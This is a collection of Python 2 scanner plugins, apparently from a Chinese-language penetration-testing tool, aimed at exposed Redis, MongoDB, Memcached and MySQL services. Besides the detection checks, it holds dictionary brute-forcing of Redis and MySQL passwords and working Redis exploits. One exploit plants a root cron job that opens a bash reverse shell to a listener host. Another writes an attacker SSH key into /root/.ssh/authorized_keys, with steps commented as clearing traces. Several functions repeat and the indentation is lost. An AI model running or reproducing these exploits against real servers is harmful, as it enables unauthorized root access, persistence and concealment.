def poc(url):
url = host2IP(url)
ip = url.split(':')[0]
port = int(url.split(':')[-1]) if ':' in url else 6379
for web_port in [80, 443, 8080, 8443]: # 判断web服务
if checkPortTcp(ip, web_port):
try:
real_url = redirectURL(ip + ':' + str(web_port))
except Exception:
real_url = ip + ':' + str(web_port)
break # TODO 这里简单化处理,只返回了一个端口的结果
else:
return False
try:
r = redis.Redis(host=ip, port=port, db=0, socket_timeout=5)
if 'redis_version' not in r.info(): # 判断未授权访问
return False
key = randomString(5)
value = randomString(5)
r.set(key, value) # 判断可写
r.config_set('dir', '/root/') # 判断对/var/www的写入权限(目前先判断为root)
r.config_set('dbfilename', 'dump.rdb') # 判断操作权限
r.delete(key)
r.save() # 判断可导出
except Exception, e:
return False
def poc(url):
"""
先检测空口令再检测弱口令
"""
bakurl = url
ip = host2IP(url)
port = 6379
payload = 'INFO\r\n'
s = socket.socket()
socket.setdefaulttimeout(TIMEOUT)
try:
host = ip.split(':')[0]
s.connect((host, port))
s.send(payload)
recvdata = s.recv(1024)
s.close()
if recvdata:
if REDIS_UNAUTH_KEYWORD in recvdata:
return '[redis-unauth] ' + bakurl + ' ' + host
elif REDIS_AUTH_KEYWORD in recvdata:
for pass_ in PASSWORD_DIC:
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host, port))
s.send("AUTH %s\r\n" %(pass_))
result = s.recv(1024)
s.close()
if result and '+OK' in result:
return '[redis-weakpass] ' + bakurl + ' ' + host + ' PASS:' + str(pass_)
except Exception:
pass
return False
def poc(url):
url = host2IP(url)
ip = url.split(":")[0]
port = int(url.split(":")[-1]) if ":" in url else 6379
for web_port in [80, 443, 8080, 8443]: # 判断web服务
if checkPortTcp(ip, web_port):
try:
real_url = redirectURL(ip + ":" + str(web_port))
except Exception:
real_url = ip + ":" + str(web_port)
break # TODO 这里简单化处理,只返回了一个端口的结果
else:
return False
try:
r = redis.Redis(host=ip, port=port, db=0, socket_timeout=5)
if "redis_version" not in r.info(): # 判断未授权访问
return False
key = randomString(5)
value = randomString(5)
r.set(key, value) # 判断可写
r.config_set("dir", "/root/") # 判断对/var/www的写入权限(目前先判断为root)
r.config_set("dbfilename", "dump.rdb") # 判断操作权限
r.delete(key)
r.save() # 判断可导出
except Exception, e:
return False
def poc(url):
url = host2IP(url)
ip = url.split(':')[0]
try:
if not checkPortTcp(ip,27017):
return False
if testConnect(ip,27017):
return ip
except Exception,e:
return False
def poc(url):
ip = host2IP(url).split(':')[0]
port = 27017
try:
if not checkPortTcp(ip, port):
return False
conn = pymongo.MongoClient(ip, port, socketTimeoutMS=3000)
dbs = conn.database_names()
return ip + ' -> ' + '|'.join(dbs) if dbs else False
except Exception:
return False
def poc(url):
url = host2IP(url) # 自动判断输入格式,并将URL转为IP
port = int(url.split(':')[-1]) if ':' in url else 6379 # 不指定端口则为默认端口
payload = '\x2a\x31\x0d\x0a\x24\x34\x0d\x0a\x69\x6e\x66\x6f\x0d\x0a'
s = socket.socket()
socket.setdefaulttimeout(10)
try:
host = url.split(':')[0]
s.connect((host, port))
s.send(payload)
recvdata = s.recv(1024)
s.close()
if recvdata and 'redis_version' in recvdata:
return True
except Exception:
pass
return False
def poc(url):
url = host2IP(url) # 自动判断输入格式,并将URL转为IP
port = int(url.split(':')[-1]) if ':' in url else 6379 # 不指定端口则为默认端口
payload = '\x2a\x31\x0d\x0a\x24\x34\x0d\x0a\x69\x6e\x66\x6f\x0d\x0a'
s = socket.socket()
socket.setdefaulttimeout(10)
try:
host = url.split(':')[0]
s.connect((host, port))
s.send(payload)
recvdata = s.recv(1024)
s.close()
if recvdata and 'redis_version' in recvdata:
return True
except Exception, e:
# print e
pass
def poc(url):
url = host2IP(url)
port = int(url.split(':')[-1]) if ':' in url else 11211
payload = '\x73\x74\x61\x74\x73\x0a' # command:stats
s = socket.socket()
socket.setdefaulttimeout(10)
try:
host = url.split(':')[0]
s.connect((host, port))
s.send(payload)
recvdata = s.recv(2048) # response larger than 1024
s.close()
if recvdata and 'STAT version' in recvdata:
ans_str = url
ans_str += ' | version:' + ''.join(re.findall(r'version\s(.*?)\s', recvdata))
ans_str += ' | total_items:' + ''.join(re.findall(r'total_items\s(\d+)\s', recvdata))
return ans_str
except Exception, e:
pass
def poc(url):
url = host2IP(url)
ip = url.split(':')[0]
port = int(url.split(':')[-1]) if ':' in url else 6379
try:
r = redis.Redis(host=ip, port=port, db=0, socket_timeout=10)
if 'redis_version' in r.info():
payload = '\n\n*/1 * * * * /bin/bash -i >& /dev/tcp/{ip}/{port} 0>&1\n\n'.format(ip=listen_ip,
port=str(listen_port))
path = '/var/spool/cron'
name = 'root'
key = randomString(10)
r.set(key, payload)
r.config_set('dir', path)
r.config_set('dbfilename', name)
r.save()
r.delete(key) # 清除痕迹
r.config_set('dir', '/tmp')
return True
except Exception, e:
# print e
return False
def poc(url):
url = host2IP(url)
ip = url.split(':')[0]
port = int(url.split(':')[-1]) if ':' in url else 6379
try:
r = redis.Redis(host=ip, port=port, db=0, socket_timeout=10)
if 'redis_version' in r.info():
payload = '\n\n*/1 * * * * /bin/bash -i >& /dev/tcp/{ip}/{port} 0>&1\n\n'.format(
ip=listen_ip, port=str(listen_port))
path = '/var/spool/cron'
name = 'root'
key = randomString(10)
r.set(key, payload)
r.config_set('dir', path)
r.config_set('dbfilename', name)
r.save()
r.delete(key) # 清除痕迹
r.config_set('dir', '/tmp')
return True
except Exception, e:
# print e
return False
def poc(url):
url = host2IP(url)
ip = url.split(':')[0]
port = int(url.split(':')[-1]) if ':' in url else 6379
try:
if not checkPortTcp(ip, 22):
return False
r = redis.Redis(host=ip, port=port, db=0)
if 'redis_version' in r.info():
key = randomString(10)
r.set(key, '\n\n' + public_key + '\n\n')
r.config_set('dir', '/root/.ssh')
r.config_set('dbfilename', 'authorized_keys')
r.save()
r.delete(key) # 清除痕迹
r.config_set('dir', '/tmp')
time.sleep(5)
if testConnect(ip, 22):
return True
except Exception, e:
# print e
return False
def poc(url):
url = host2IP(url)
ip = url.split(':')[0]
port = int(url.split(':')[-1]) if ':' in url else 6379
try:
if not checkPortTcp(ip, 22):
return False
r = redis.Redis(host=ip, port=port, db=0)
if 'redis_version' in r.info():
key = randomString(10)
r.set(key, '\n\n' + public_key + '\n\n')
r.config_set('dir', '/root/.ssh')
r.config_set('dbfilename', 'authorized_keys')
r.save()
r.delete(key) # 清除痕迹
r.config_set('dir', '/tmp')
time.sleep(5)
if testConnect(ip, 22):
return True
except Exception:
return False
return False
def poc(url):
timeout = 5
socket.setdefaulttimeout(timeout)
user_list = ['root']
ip = host2IP(url)
port = 3306
for user in user_list:
for pass_ in MYSQL_PASSWORD_DICT:
try:
# pass_ = str(pass_.replace('{user}', user))
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect((ip, int(port)))
packet = sock.recv(254)
# print packet
plugin, scramble = get_scramble(packet)
auth_data = get_auth_data(user, pass_, scramble, plugin)
sock.send(auth_data)
result = sock.recv(1024)
if result == "\x07\x00\x00\x02\x00\x00\x00\x02\x00\x00\x00":
return u"[MySQL弱口令] 存在弱口令, %s , %s:%s 账号:%s,密码:%s" % (
url, ip, port, user, pass_)
except Exception:
return
